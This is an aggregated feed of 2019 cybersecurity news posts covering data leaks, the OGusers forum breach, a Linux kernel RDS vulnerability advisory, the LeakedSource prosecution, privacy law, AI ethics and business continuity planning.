Last time, I spoke with technology marketing communicator Stacey Holleran. Our work is similar but different. Plus, she warned me about what I might expect from the tech industry in a few years when I turn 40! For my last interview until fall/autumn, I had the pleasure of speaking with Yaz. She went from the […]… Read More

The post Women and Nonbinary People in Information Security: Yaz appeared first on The State of Security.

Letting Go While Holding On: Managing Cyber Risk in Cloud Environments

As recently as 2017, security and compliance professionals at many of Tripwire’s large enterprise and government customers were talking about migration to the cloud as a possibility to be considered and cautiously explored in the coming years. Within a year, the tone had changed. What used to be “we’re thinking about it” became “the CIO […]… Read More

The post Letting Go While Holding On: Managing Cyber Risk in Cloud Environments appeared first on The State of Security.

ThreatQ adds support for mobile and PRE-ATT&CK in response to rapid customer adoption

ThreatQuotient, a leading security operations platform innovator, announced that the ThreatQ integration with MITRE ATT&CK now includes support for PRE-ATT&CK and Mobile. Together with Enterprise ATT&CK, the three-pronged framework creates an end-to-end attack chain that examines and assesses an adversaries’ actions. Since first integrating with MITRE ATT&CK in early 2018, ThreatQuotient has helped customers integrate the framework in their workflows to achieve a holistic view of their organization’s specific attack vectors and what needs to … More

The post ThreatQ adds support for mobile and PRE-ATT&CK in response to rapid customer adoption appeared first on Help Net Security.

Exabeam enhances security management approach and boosts cybersecurity degree program

Exabeam, the Smarter SIEM company, announced a partnership with Deakin University in Australia to strengthen its security management approach and bolster its already distinguished cybersecurity degree program, delivered through the School of IT. The university not only deployed Exabeam Advanced Analytics to help process the large amounts of generated data and spot anomalies on its network; it also turned to the security management leader’s industry expertise to build out its curriculum and initiate a real-life … More

The post Exabeam enhances security management approach and boosts cybersecurity degree program appeared first on Help Net Security.

Catchpoint’s new monitoring platform offers continuous visibility into all network dependencies

Catchpoint, the digital experience monitoring (DEM) leader, introduced Internet Intelligence, a new monitoring capability providing organizations with deeper visibility into the health and pathways of the external and internal networks upon which their applications or digital services depend. Internet Intelligence shows a network’s impact on the end user experience by continuously monitoring network health and network paths to private, public or hybrid clouds, CDNs, and other distributed IT architecture. This far-reaching visibility isolates degradations across … More

The post Catchpoint’s new monitoring platform offers continuous visibility into all network dependencies appeared first on Help Net Security.

Tata Communications and Cisco to enable enterprises a multi-cloud native hybrid network transformation

The leading global digital infrastructure provider Tata Communications and Cisco have extended their partnership to enable enterprises to transform their legacy network to a customised and secure multi-cloud native hybrid network. The combination of Tata Communications’ IZO cloud enablement platform and Cisco SD-WAN is a fully-managed, global solution that gives businesses greater control over their digital infrastructure, the ability to securely connect any user to any application location, and provide the assurance of application performance … More

The post Tata Communications and Cisco to enable enterprises a multi-cloud native hybrid network transformation appeared first on Help Net Security.

BC in the Cloud rebrands as Infinite Blue and expands its enterprise application business

BC in the Cloud announced its new name, Infinite Blue, and its acquisition of Rollbase, a low-code development platform that helps customers to deliver agile, adaptable business applications quickly, increasing speed to market. Infinite Blue’s new offering — Infinite Blue Platform — will combine a low-code development platform with a flexible deployment architecture to make it easier than ever to build, deploy and manage business applications. The company will use Infinite Blue Platform to power … More

The post BC in the Cloud rebrands as Infinite Blue and expands its enterprise application business appeared first on Help Net Security.

Mellanox launches Ethernet Cloud Fabric technology based on Spectrum-2

Mellanox Technologies, a leading supplier of high-performance, end-to-end smart interconnect solutions for data center servers and storage systems, introduced breakthrough Ethernet Cloud Fabric (ECF) technology based on Spectrum-2, the world’s most advanced 100/200/400 Gb/s Ethernet switches. ECF technology provides the ideal platform to quickly build and simply deploy state of the art public and private cloud data centers with improved efficiency and manageability. ECF combines three critical capabilities: Industry-leading packet forwarding data plane Agile, flexible … More

The post Mellanox launches Ethernet Cloud Fabric technology based on Spectrum-2 appeared first on Help Net Security.

Syncsort launches Syncsort Invent initiative to help orgs anticipate and embrace Next Wave technologies

Syncsort, the global leader in Big Iron to Big Data software, announced the launch of Syncsort Invent, an initiative focused on helping enterprises anticipate and embrace the Next Wave – an era that defines the new technologies and applications that are making existing data more useful. Syncsort Invent advances data by helping enterprises connect decades of data infrastructure investment with Next Wave technologies such as cloud and blockchain. “We believe that data makes the difference. … More

The post Syncsort launches Syncsort Invent initiative to help orgs anticipate and embrace Next Wave technologies appeared first on Help Net Security.

Syncurity IR-Flow SOAR platform now in the Oracle Cloud Marketplace

Syncurity, a market leader in Security Orchestration, Automation and Response (SOAR), and a Silver level member of Oracle PartnerNetwork (OPN), announced that its award-winning and patent-pending IR-Flow SOAR platform has achieved Powered by Oracle Cloud status and is now available in the Oracle Cloud Marketplace, offering added value to Oracle Cloud customers. The IR-Flow SOAR platform, Syncurity IR-Flow, enables a “process-first” approach to streamlining the entire incident management process — from proactive threat hunting and … More

The post Syncurity IR-Flow SOAR platform now in the Oracle Cloud Marketplace appeared first on Help Net Security.

Data belonging to Instagram influencers and celebrities exposed online

A new data leak made the headlines, a database containing the contact information of millions of Instagram influencers, celebrities and brand accounts has been found online.

The news was first reported by the TechCrunch website, a database was left unprotected on an AWS bucket, anyone was able to access it without authentication.


The unprotected database was discovered by the security researcher Anurag Sen that immediately reported its discovery to TechCrunch in an effort to find the owner.

“A massive database containing contact information of millions of Instagram  influencers, celebrities and brand accounts has been found online.” states TechCrunch.

“At the time of writing, the database had over 49 million records — but was growing by the hour.”

The database contained public data scraped from influencer Instagram accounts, including their bio, profile picture, the number of followers, have, if they’re verified, their location by city and country, private contact information, the email address and phone number of the Instagram account owner.

Each record in the database also contained a field that calculated the worth of each account.

The list of influencers in the archive includes prominent food bloggers, celebrities and other social media influencers.

According to TechCrunch, the database belongs to India-based social media marketing firm Chtrbox, which pays influencers to post sponsored content on their accounts.

Strangely two people contacted by TechCrucnh that confirmed the authenticity of the data in the archive denied any involvement with Chtrbox.

“We contacted several people at random whose information was found in the database and provided them their phone numbers. Two of the people responded and confirmed their email address and phone number found in the database was used to set up their Instagram accounts.” continues the website. “Neither had any involvement with Chtrbox, they said.”

TechCrunch contacted Chtrbox that secured the database, but it is not clear how the company obtained those data.

Facebook, that currently owns Instagram, announced it is investigating the incident.

“We’re looking into the issue to understand if the data described – including email and phone numbers – was from Instagram or from other sources,” reads a statement from Facebook. “We’re also inquiring with Chtrbox to understand where this data came from and how it became publicly available,”

In 2017, a vulnerability in the Instagram application that allowed hackers to access information for high-profile users including phone numbers and email addresses of 6 million celebrities.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Instagram, data leak)

The post Data belonging to Instagram influencers and celebrities exposed online appeared first on Security Affairs.

Lattice Semiconductor enhances its Lattice sensAI solutions stack

Lattice Semiconductor Corporation, the low power programmable leader, announced major performance and design flow enhancements for its award-winning Lattice sensAI solutions stack. The Lattice sensAI stack provides a comprehensive hardware and software solution for implementing low power (1mW-1W), always-on artificial intelligence (AI) functionality in smart devices operating at the Edge. IHS forecasts 40 billion devices will be operating at the network Edge by 2025. For reasons including latency, network bandwidth limitations, and data privacy, OEMs … More

The post Lattice Semiconductor enhances its Lattice sensAI solutions stack appeared first on Help Net Security.

Privacy Intelligence News & Insights: New Jersey and Washington Amend State Data Breach Notification Laws

On May 10, New Jersey Bill S-52 was signed into law, which amends the state’s data breach notification law to expand the definition of personal information. Under the amended law, effective September 1, 2019, “personal information” that requires a company to notify individuals if breached now includes a “user name, email address, or any other account holder identifying information, in combination with any password or security questions and answer.” In Washington, the state legislature passed an amendment to the existing data breach notification law that expands the list of data elements that require notification to individuals if breached in combination with an … Continue reading Privacy Intelligence News & Insights: New Jersey and Washington Amend State Data Breach Notification Laws

The post Privacy Intelligence News & Insights: New Jersey and Washington Amend State Data Breach Notification Laws appeared first on TrustArc Blog.

The Concept of "Return on Data"

This law review article by Noam Kolt, titled "Return on Data," proposes an interesting new way of thinking of privacy law.

Abstract: Consumers routinely supply personal data to technology companies in exchange for services. Yet, the relationship between the utility (U) consumers gain and the data (D) they supply -- "return on data" (ROD) -- remains largely unexplored. Expressed as a ratio, ROD = U / D. While lawmakers strongly advocate protecting consumer privacy, they tend to overlook ROD. Are the benefits of the services enjoyed by consumers, such as social networking and predictive search, commensurate with the value of the data extracted from them? How can consumers compare competing data-for-services deals? Currently, the legal frameworks regulating these transactions, including privacy law, aim primarily to protect personal data. They treat data protection as a standalone issue, distinct from the benefits which consumers receive. This article suggests that privacy concerns should not be viewed in isolation, but as part of ROD. Just as companies can quantify return on investment (ROI) to optimize investment decisions, consumers should be able to assess ROD in order to better spend and invest personal data. Making data-for-services transactions more transparent will enable consumers to evaluate the merits of these deals, negotiate their terms and make more informed decisions. Pivoting from the privacy paradigm to ROD will both incentivize data-driven service providers to offer consumers higher ROD, as well as create opportunities for new market entrants.

Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS

Experts discovered a privilege escalation vulnerability in the Linux Kernel, tracked as CVE-2019-11815, that affects the implementation of RDS over TCP.

Experts discovered a memory corruption vulnerability in Linux Kernel that resides in the implementation of the Reliable Datagram Sockets (RDS) over TCP.

The vulnerability tracked as CVE-2019-11815 could lead to privilege escalation, it received a CVSS base score of 8.1. The vulnerability only affects Linux kernels prior to 5.0.8, that use the Reliable Datagram Sockets (RDS) for the TCP module.

“An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.” reads the security advisory published by the NIST.

The NIST classified the flaw as a race condition that affects the kernel’s rds_tcp_kill_sock in net/rds/tcp.c.. 

The vulnerability could be exploited by a remote attacker with no privileges over the network, the issue doesn’t require user interaction.

An attacker could exploit the vulnerability to access restricted information or trigger a denial of service condition. 

“A system that has the rds_tcp kernel module loaded (either through autoload via local process running listen(), or manual loading) could possibly cause a use after free (UAF) in which an attacker who is able to manipulate socket state while a network namespace is being torn down,” reads the advisory published by Red Hat.

According to a note included in the security advisory published by Canonical, there is no evidence that the bug is remotely exploitable. 

“I haven’t yet seen evidence to support allegations that this is remotely exploitable. Blacklisting rds.ko module is probably sufficient to prevent the vulnerable code from loading.” said Seth Arnold from the Ubuntu’s security team. “The default configuration of the kmod package has included RDS in /etc/modprobe.d/blacklist-rare-network.conf since 14.04 LTS. I’m dropping priority as a result.”

Both Suse and Debian also published security advisories for the
CVE-2019-11815 vulnerability.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Linux, CVE-2019-11815)

The post Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS appeared first on Security Affairs.

Criminals Hack Forum Used for Trading Stolen Credentials

This is really interesting- a popular online forum that hackers have been using to trade stolen credentials has been hacked!

Reports confirm that OGusers, a popular online form used by hackers to trade stolen account credentials, has been hacked and that this had caused sensitive personal data of many users to be exposed.

Brian Krebs writes, in his website KrebsOnSecurity, “Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.”

It all started with an administrator of OGusers explaining to forum members, on May 12, that an outage had caused a hard drive failure, leading to the erasure of private messages, forum posts and prestige points that’s worth several months. He also stated that he had restored a backup from January 2019. But then, the OGusers administrators didn’t realize that what had happened, coinciding with the outage, was the theft of users’ database from the forum and the wiping of forum hard drives as well. Four days later, on May 16, the administrator of rival hacking community RaidForums uploaded the entire OGusers database for anyone to download for free.

The KrebsOnSecurity report quotes the message that RaidForums administrator Omnipotent has posted. It reads, “On the 12th of May 2019 the forum was breached [and] 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”

Brian Krebs further says, “The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).”

Experts point out that although the passwords that were exposed are hashed, the fact that the encryption method used was MD5, an older and easily hackable form of encryption, puts all passwords at risk of exposure.

Since OGusers is already known as a forum that attracts people who hijack phone numbers to take over victims’ social media, financial accounts, email etc and sell such access for thousands of dollars, the exposure has caused shock among many in the community. Anxious members responded promptly and, as per Brian Krebs, some of them even complained of being targeted by phishing emails. It’s also reported that some members even expressed anger at the main administrator of OGusers. The members even seemed to claim that the main administrator, who uses the nickname ‘Ace’, altered the functionality of the forum following the hack so as to prevent users from removing their accounts.

On the other hand, reports say that an OGusers administrator commented, after the hack was disclosed, that though members’ frustration is understandable, it’s to be noted that even Twitter, Facebook and other Forums that people have used have been breached more than once.

Brian Krebs concludes his report with a very relevant remark. He says, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”

Also, Read:

Cyber Criminals are selling Hacking Tools on the Dark Web

Malaysia Continues to Lure Cybercriminals: Report

How Cyber Criminals Attempt Cashing in on Cryptocurrency

Cyber Criminals to Exploit Vulnerabilities

Cyber Criminals Will Attack Critical IT Infrastructure

The post Criminals Hack Forum Used for Trading Stolen Credentials appeared first on .

Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques

This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called “BlackWater” is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater’s tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim’s machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater’s latest TTPs.

Read More

The post Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques appeared first on Cisco Blog.

Episode 496 – The Most Dangerous Email Attachment Types

Email is still the number one communication method used today. People also use it primarily to send files and forth. Even though you may know and trust a source you should still be cautious on the file types being sent and the security controls to ensure those files are not inadvertently going to cause problems. […]

The post Episode 496 – The Most Dangerous Email Attachment Types appeared first on Security In Five.

How to Get the Best Layered and Integrated Endpoint Protection

Security teams have historically been challenged by the choice of separate next-gen endpoint security technologies or a more integrated solution with a unified management console that can automate key capabilities.

At this point it’s not really a choice at all – the threat landscape requires you to have both. The best layered and integrated defenses now include a broad portfolio of advanced prevention technologies, endpoint security controls, and advanced detection/response tools – all within an integrated system that goes beyond alerts and into insights that even a junior analyst can act on.

More Endpoints = More Vulnerabilities

Endpoints are long beyond on-premises servers, PCs, and traditional operating systems. Internet of things devices such as printers, scanners, point-of-sale handhelds, and even wearables are vulnerable and can provide entry points for organized attacks seeking access to corporate networks. Mobile devices—both BYOD and corporate issued—are among the easiest targets for app-based attacks. Per the 2019 McAfee Mobile Threat Report, the number one threat category was hidden apps, which accounted for almost one-third of all mobile attacks.

Many enterprises are unaware of their target-rich endpoint environments, resulting in security teams struggling to maintain complete vigilance. A 2018 SANS Survey on Endpoint Protection and Response revealed some sobering statistics:

  • 42% of respondents report having had their endpoints exploited
  • 84% of endpoint breaches include more than one endpoint
  • 20% didn’t know whether they’d been breached

Endpoint attacks are designed to exploit the hapless user, including web drive-by, social engineering/phishing, and ransomware. Because these attacks rely on human actions, there’s a need for increased monitoring and containment, along with user education.

The latest attacks have the ability to move laterally across your entire environment, challenging every endpoint until a vulnerability is found. Once inside your walls, all endpoints become vulnerable. Modern endpoint security must extend protection across the entire digital terrain with visibility to spot all potential risks.

Less Consoles = Better Efficiency

A 2018 MSA Research report on security management commissioned by McAfee revealed that 55% of organizations struggle to rationalize data when three or more consoles are present. Too many security products, devices, and separate consoles call for a large budget and additional employees who might struggle to maintain a secure environment.

In contrast, single management consoles can efficiently coordinate the defenses built into modern devices while extending their overall posture with advanced capabilities—leaving nothing exposed. With everchanging industry requirements, an integrated endpoint security approach ensures that basic standards and processes are included and up to date.

Why McAfee Endpoint Security

McAfee offers a broad portfolio of security solutions that combine established capabilities (firewall, reputation, and heuristics) with cutting-edge machine learning and containment, along with endpoint detection and response (EDR) into a single-agent all-inclusive management console.

Is it time you took a fresh look at your strategy? Learn more in this white paper: Five ways to rethink your endpoint protection strategy.

The post How to Get the Best Layered and Integrated Endpoint Protection appeared first on McAfee Blogs.

Ecuador Shares Assange’s Legal Docs with US

Ecuador Shares Assange's Legal Docs with US

Complying with a request by US authorities, Ecuadorian officials are preparing to hand over documents that are reportedly the entire legal defense against Julian Assange, compiled during the time he has been living in the Ecuadorian embassy in London, according to WikiLeaks.

"On Monday Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June," WikiLeaks editor-in-chief Kristinn Hrafnsson said. "The Trump administration is inducing its allies to behave like it's the Wild West."

Assange’s lawyers are reportedly not permitted to be present during what is being called the “illegal seizure of his property.”

“The material includes two of his manuscripts, as well as his legal papers, medical records and electronic equipment. The seizure of his belongings violates laws that protect medical and legal confidentiality and press protections,” WikiLeaks said.

Ecuador officials also refused a request by UN special rapporteur on privacy, who requested permission to monitor Ecuador's seizure of Assange's property.

The US had previously asked Ecuador to share audiovisual material and additional documents, which had reportedly been collected during an internal spying operation against Assange, WikiLeaks said.

"It is extremely worrying that Ecuador has proceeded with the search and seizure of property, documents, information and other material belonging to the defense of Julian Assange, which Ecuador arbitrarily confiscated, so that these can be handed over to the agent of political persecution against him, the United States. It is an unprecedented attack on the rights of the defence, freedom of expression and access to information exposing massive human rights abuses and corruption. We call on international protection institutions to intervene to put a stop to this persecution," said Baltasar Garzón, international legal coordinator for the defense of Assange and WikiLeaks.

Though Ecuador is obviously not a part of the EU, "if arguing that because Assange is an EU resident and therefore subject to the protections of GDPR, Article 23 makes a pretty strong case that those protections become restricted if revealing that data was a matter of national defense or if some other form of legal matter, either criminal or civil, is involved,” said Nathan Wenzler, senior director of cybersecurity at Moss Adams.

“While I’m not a lawyer, it seems likely that all nations involved would have a good chance of demonstrating some sort of legal action involved here and thus, make this action a non-event under the provisions of GDPR. Morally, there’s a whole other argument here that could (and should, in my opinion) be had. However, I’m not sure there’s much that can or will be done under GDPR in this case.”

Publishers and Privacy: How Ad-Supported Websites Can Manage Privacy and Minimize Risk

Content publishers, media and other advertising-supported websites have already had to grapple with the privacy requirements put forth in the EU General Data Protection Regulation (GDPR). Similar regulations are also in force in a number of other countries in the Americas, Europe and Asia. In addition, at the start of 2020, publishers will have to comply with the California Consumer Privacy Act (CCPA). Still more privacy regulations are being advanced and debated in other U.S. states, and around the world. In fact, more than ten different U.S. states, including Massachusetts and Texas, are in the process of considering privacy laws … Continue reading Publishers and Privacy: How Ad-Supported Websites Can Manage Privacy and Minimize Risk

The post Publishers and Privacy: How Ad-Supported Websites Can Manage Privacy and Minimize Risk appeared first on TrustArc Blog.

Why AI Innovation Must Reflect Our Values in Its Infancy

In my last blog, I explained that while AI possesses the mechanics of humanness, we need to train the technology to make the leap from mimicking humanness with logic, rational and analytics to emulating humanness with common sense. If we evolve AI to make this leap the impact will be monumental, but it will require our global community to take a more disciplined approach to pervasive AI proliferation. Historically, our enthusiasm for and consumption of new technology has outpaced society’s ability to evolve legal, political, social, and ethical norms.

I spend most of my time thinking about AI in the context of how it will change the way we live. How it will change the way we interact, impact our social systems, and influence our morality.  These technologies will permeate society and the ubiquity of their usage in the future will have far reaching implications. We are already seeing evidence of how it changes how we live and interact with the world around us.

Think Google. It excites our curiosity and puts information at our fingertips. What is tripe – should I order it off the menu? Why do some frogs squirt blood from their eyes? What does exculpatory mean?

AI is weaving the digital world into the fabric of our lives and making information instantaneously available with our fingertips.

AI-enabled technology is also capable of anticipating our needs. Think Alexa. As a security professional I am a hold out on this technology but the allure of it is indisputable. It makes the digital world accessible with a voice command. It understands more than we may want it to – Did someone tell Alexa to order coffee pods and toilet tissue and if not – how did Alexa know to order toilet tissue? Maybe somethings I just don’t want to know.

I also find it a bit creepy when my phone assumes (and gets it right) that I am going straight home from the grocery store letting me know, unsolicited, that it will take 28 minutes with traffic. How does it know I am going home? I could be going to the gym. It’s annoying that it knows I have no intention of working out. A human would at least have the decency to give me the travel time to both, allowing me to maintain the illusion that the gym was an equal possibility.

On a more serious note, AI-enabled technology will also impact our social, political and legal systems. As we incorporate it into more products and systems, issues related to privacy, morality and ethics will need to be addressed.

These questions are being asked now, but in anticipation of AI becoming embedded in everything we interact with it is critical that we begin to evolve our societal structures to address both the opportunities and the threats that will come with it.

The opportunities associated with AI are exciting.  AI shows incredible promise in the medical world. It is already being used in some areas. There are already tools in use that leverage machine learning to help doctors identify disease related patterns in imaging. Research is under way using AI to help deal with cancer.

For example, in May 2018, The Guardian reported that skin cancer research using a convolutional neural network (CNN – based on AI) detected skin cancer 95% of the time compared to human dermatologists who detected it 86.6% of the time. Additionally, facial recognition in concert with AI may someday be commonplace in diagnosing rare genetic disorders, that today, may take months or years to diagnose.

But what happens when the diagnosis made by a machine is wrong? Who is liable legally? Do AI-based medical devices also need malpractice insurance?

The same types of questions arise with autonomous vehicles. Today it is always assumed a human is behind the wheel in control of the vehicle. Our laws are predicated on this assumption.

How must laws change to account for vehicles that do not have a human driver? Who is liable? How does our road system and infrastructure need to change?

The recent Uber accident case in Arizona determined that Uber was not liable for the death of a pedestrian killed by one of its autonomous vehicles. However, the safety driver who was watching TV rather than the road, may be charged with manslaughter. How does this change when the car’s occupants are no longer safety drivers but simply passengers in fully autonomous vehicles. How will laws need to evolve at that point for cars and other types of AI-based “active and unaided” technology?

There are also risks to be considered in adopting pervasive AI. Legal and political safeguards need to be considered, either in the form of global guidelines or laws. Machines do not have a moral compass. Given that the definition of morality may differ depending on where you live, it will be extremely difficult to train morality into AI models.

Today most AI models lack the ability to determine right from wrong, ill intent from good intent, morally acceptable outcomes from morally irreprehensible outcomes. AI does not understand if the person asking the questions, providing it data or giving it direction has malicious intent.

We may find ourselves on a moral precipice with AI. The safeguards or laws I mention above need to be considered before AI becomes more ubiquitous than it already is.  AI will enable human kind to move forward in ways previously unimagined. It will also provide a powerful conduit through which humankind’s greatest shortcomings may be amplified.

The implications of technology that can profile entire segments of a population with little effort is disconcerting in a world where genocide has been a tragic reality, where civil obedience is coerced using social media, and where trust is undermined by those that use mis-information to sew political and societal discontent.

There is no doubt that AI will make this a better world. It gives us hope on so many fronts where technological impasses have impeded progress. Science may advance more rapidly, medical research progress beyond current roadblocks and daunting societal challenges around transportation and energy conservation may be solved.  It is another tool in our technological arsenal and the odds are overwhelmingly in favor of it improving the global human condition.

But realizing its advantages while mitigating its risks will require commitment and hard work from many conscientious minds from different quarters of our society. We as the technology community have an obligation to engage key stakeholders across the legal, political, social and scientific community to ensure that as a society we define the moral guardrails for AI before it becomes capable of defining them, for or in spite of, us.

Like all technology before it, AI’s social impacts must be anticipated and balanced against the values we hold dear.  Like parents raising a child, we need to establish and insist that the technology reflect our values now while its growth is still in its infancy.

The post Why AI Innovation Must Reflect Our Values in Its Infancy appeared first on McAfee Blogs.

New South Wales Announces New Cybersecurity Position

New South Wales Announces New Cybersecurity Position

In an attempt to centralize all of the cyber efforts and strategies of the state, New South Whales (NSW) has announced a new cybersecurity NSW office to be led by led by Tony Chapman, chief cybersecurity officer, according to a May 20 press release.

Chapman assumed the position today, which falls under the department of customer service, and wrote via LinkedIn, “The changes reflect the leadership and coordination role required to uplift cyber security and decision-making across NSW Government.

I am performing the functions previously undertaken by the NSW Government Chief Information Security Officer (GCISO), established in March 2017, with a renewed focus on securing digital transformation and the continual improvement of customer service outcomes.”

To enable digital transformation, a part of the overall vision of the new customer service cluster, the office will focus on improving cybersecurity capabilities and standards to include a coordinated cyber-incident response plan and develop strategic cyber-policy positions through a revitalized cybersecurity senior officers’ group (CSSOG), according to Chapman.

To see the vision of the new customer service cluster to its fruition, Chapman said he will work to strengthen ties across NSW's government, other states' governments and the federal government to establish cybersecurity best practices that will yield better results for citizens.

“A key component of the role will be driving a culture of risk management and awareness to support greater resilience to cyber security threats. Tony and his team will build on the digital transformation work occurring across the NSW government, ensuring our digital spaces are safeguarded against cyber threats,” said the state government's chief information and digital officer, Greg Wells, in the press release.

“Cybersecurity NSW will continue its critical work enhancing whole-of-government cyber security capabilities and standards on behalf of NSW. It will also work more closely with the information and privacy commission on security, privacy and the availability of systems and services during the State’s digital transformation.”

Don’t have your account hijacked. Secure your online accounts with more than a password, says Google

Research published at the end of last week argues that the typical user can significantly harden the security of their online accounts by linking a recovery phone number that can send an alert if there is suspicious activity on the account.

Read more in my article on the Hot for Security blog.

Online Account Hijacker Forum OGUsers Hacked

Online Account Hijacker Forum OGUsers Hacked

An online forum used by those involved in online account hijacking has been breached, according to KrebsonSecurity.

An attack on leaked the personal information of nearly 113,000 people. Krebs reportedly received a copy of the database, which included usernames, email addresses, hashed passwords, private messages and IP address.

The RaidForums Omnipotent administrator announced to forum members that he had made the OGUsers forum database for available for download, writing:

Hello RaidForums Community,

Today I have uploaded the OGUsers Forum Database for you to download for free, thanks for reading and enjoy!

On the 12th of May 2019 the forum was breached 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I'm the first to tell you the truth view his statement here or if you don't want to visit their website view it here. According to his statement he didn't have any recent backups so I guess I will provide one on this thread lmfao.

Compromised data: Website activity, Usernames, Emails, IP Addresses, Passwords (Salted MD5), Source code, Website data, User private messages.

While users on the forum expressed concern about their identities being revealed as a result of the hack, Krebs said, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”

Defiant Tech firm who operated LeakedSource pleads guilty

The Royal Canadian Mounted Police (RCMP), announced that the company behind LeakedSource, Defiant Tech Inc., pleads guilty in Canada.

Defiant Tech Inc., the company behind the website, pleaded guilty in Canada.

The LeakedSource website was launched in late 2015, in January 2017 the popular data breach notification website has been raided by feds.

It reported some of the largest data breaches, including the ones that affected Last.fmRambler.ruFriendFinder NetworksLinkedIn, and MySpace.


In December 2017, the Canadian man Jordan Evan Bloom (27) was charged with data leak of 3 billion hacked accounts, the man was running a website to collect personal data and login credentials from the victims.

The man was charged as part of an investigation dubbed “Project Adoration,” aiming at trafficking in personal data, unauthorized use of computers, and possession of an illicitly obtained property.

The RCMP alleges that Bloom was the administrators of the website that operated through his company Defiant Tech.

LeakedSource offered for sale access to data gathered data from the victims of security breaches, sometimes buying it from hackers.

For $2 a day, a subscriber at LeakedSource, had the possibility to obtain the details on individuals by entering his email address or username. LeakedSource was also cracking the associated passwords when it was possible. The website was very popular among the users of the

“A guilty plea was entered in court today by Defiant Tech Inc., to the charges of Trafficking In Identity Information and Possession of Property Obtained By Crime a year and a half after charges were laid into the RCMP’s cybercrime investigation dubbed Project “Adoration”. ” reads the press release published by RCMP.

“ had a database of approximately three billion personal identity records and associated passwords that could be purchased for a small fee. Defiant Tech Inc. was operating the website and the company earned approximately $247,000 from trafficking identity information. “

The arrest of Bloom is the result of a joint effort of Canadian authorities, FBI and Dutch National Police.

According to the Royal Canadian Mounted Police, Defiant Tech made around CAN$247,000 (US$183,000) from his illegal activities.

“We are pleased with this latest development,” said Superintendent Mike Maclean, Officer in Charge Criminal Operations of the RCMP National Division. “I am immensely proud of this outcome as combatting cybercrime is an operational priority for us.”

According to the experts, Bloom didn’t operate the website alone, at least another US citizen was involved, but none was charged for this.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cybercrime, LeakedSource)

The post Defiant Tech firm who operated LeakedSource pleads guilty appeared first on Security Affairs.

How to write a business continuity plan: the easy way

Earthquake. Flood. Cyber attack. The threat of disruption looms over organisations more ominously than ever, thanks to the increasing infiltration of technology in business processes, consumer expectations and the rapid rise in cyber crime.

You’ll rarely get advance warning about disruptions, so you need to prepare for whatever might come your way with a BCP (business continuity plan).

In this blog, we explain how a BCP works, what it covers and how to create one.

What is a business continuity plan?

A BCP outlines the processes and procedures that an organisation must follow to continue operating in the event of a disruption. The steps outlined in a BCP are typically a set of temporary measures or quick fixes to ensure that the most important business operations remain functional, even if at the cost of overall productivity.

Organisations’ top priorities tend to be their technologies, and for good reason. Network connections, online systems, phone lines, network drives, servers and business applications are all vulnerable to a range of disruptions and can cause huge headaches if they are compromised.

But business continuity planning isn’t about recovering IT. It’s primarily concerned with critical activities that, if disrupted, could immediately jeopardise your productivity or the availability of your services. In that regard, it simply considers IT a critical resource for preserving those activities – in other words, a dependency.

However, recovering your IT may take some time, so you should have a plan on how to manage in the meantime. Such temporary solutions may well be lo-fi; even so, organisations must outline them in a BCP to ensure employees know what’s expected of them.

Business continuity vs disaster recovery

BCPs shouldn’t be confused with DRPs (disaster recovery plans), even though they both tackle the immediate aftermath of a disruption.

Business continuity focuses primarily on ensuring that you maintain functionality – even if at reduced capacity – in the event of an incident while attending to the disruption. Disaster recovery is a purely corrective measure that looks to recover to full IT functionality as quickly as possible.

These concepts might sound similar enough, but business continuity’s focus on first and foremost reviving the most critical business functions is a crucial difference, and one that makes it a good idea to separate it from disaster recovery. The latter is usually just used in an IT context, as only semi-functioning technology often isn’t good for operations, but achieving full recovery may take some time.

Business continuity recognises that time is of the essence, and often involves temporary fixes that ensure vital operations continue. Recovery is also time-sensitive; temporary solutions don’t tend to offer the same level of productivity, so you don’t want to rely on them for long.

